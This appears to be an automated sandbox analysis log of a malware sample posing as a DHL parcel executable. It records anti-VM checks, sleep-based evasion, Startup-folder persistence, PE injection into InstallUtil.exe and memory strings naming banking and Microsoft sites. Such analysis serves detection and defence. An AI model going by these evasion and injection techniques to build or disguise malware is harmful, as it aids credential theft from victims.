Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -95344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -95233s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -95077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -94967s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -94860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -94735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -94610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -94485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -94360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1088	Thread sleep count: 2511 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -99859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -99750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -99626s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1088	Thread sleep count: 6498 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -99389s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -99277s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -98937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -98806s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -98703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -98539s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -98375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -98102s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -97887s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -97781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -97672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -97562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -97344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -97234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -97125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -97016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -96906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -96797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -96688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -96563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -96438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -96313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -96202s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -96094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -95969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -95820s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -95716s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -95609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -95476s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -95340s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -95234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -95125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -95016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -94891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -94781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -94672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe TID: 1772	Thread sleep time: -94563s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 99747	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 99532	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 99407	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 99282	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 98938	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 98803	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 98571	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 98464	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 98360	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 98219	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 97974	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 97860	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 97741	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 97625	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 97405	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 97297	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 97188	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 97078	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 96969	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 96860	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 96735	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 96610	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 96485	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 96360	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 96235	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 96110	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 95985	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 95860	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 95735	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 95610	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 95485	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 95344	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 95233	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 95077	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 94967	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 94860	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 94735	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 94610	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 94485	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 94360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 99750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 99626	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 99389	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 99277	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 98937	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 98806	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 98539	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 98375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 98102	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 98000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 97887	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 97781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 97672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 97562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 97344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 97234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 97125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 97016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 96906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 96797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 96688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 96563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 96438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 96313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 96202	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 96094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 95969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 95820	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 95716	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 95609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 95476	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 95340	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 95234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 95125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 95016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 94891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 94781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 94672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 94563	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: WebData.2.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: WebData.2.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Size.exe, 00000006.00000002.2293133444.000000000331C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $eqEMuzfeq.resources, Version=1.0.0.0, Culture=en-GB, PublicKeyToken=nulllyeqX
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Size.exe, 00000006.00000002.2291142461.0000000001516000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: WebData.2.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: InstallUtil.exe, 00000002.00000002.3289514725.0000000000E53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3288495105.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WebData.2.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2115169313.00000000063E0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: S7HgfSWKgw
Source: WebData.2.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WebData.2.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WebData.2.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2096165607.0000000000B04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WebData.2.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.000000000288C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $eqEMuzfeq.resources, Version=1.0.0.0, Culture=en-GB, PublicKeyToken=nulllyeq,
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WebData.2.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WebData.2.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WebData.2.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Size.exe, 00000006.00000002.2293133444.000000000331C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000007.00000002.3287434454.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmtools
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Size.exe, 00000006.00000002.2293133444.000000000331C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: WebData.2.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: WebData.2.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WebData.2.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Size.exe

Code function: 6_2_07360344 rdtsc

6_2_07360344

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 439000	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 906008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 439000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A82008	Jump to behavior

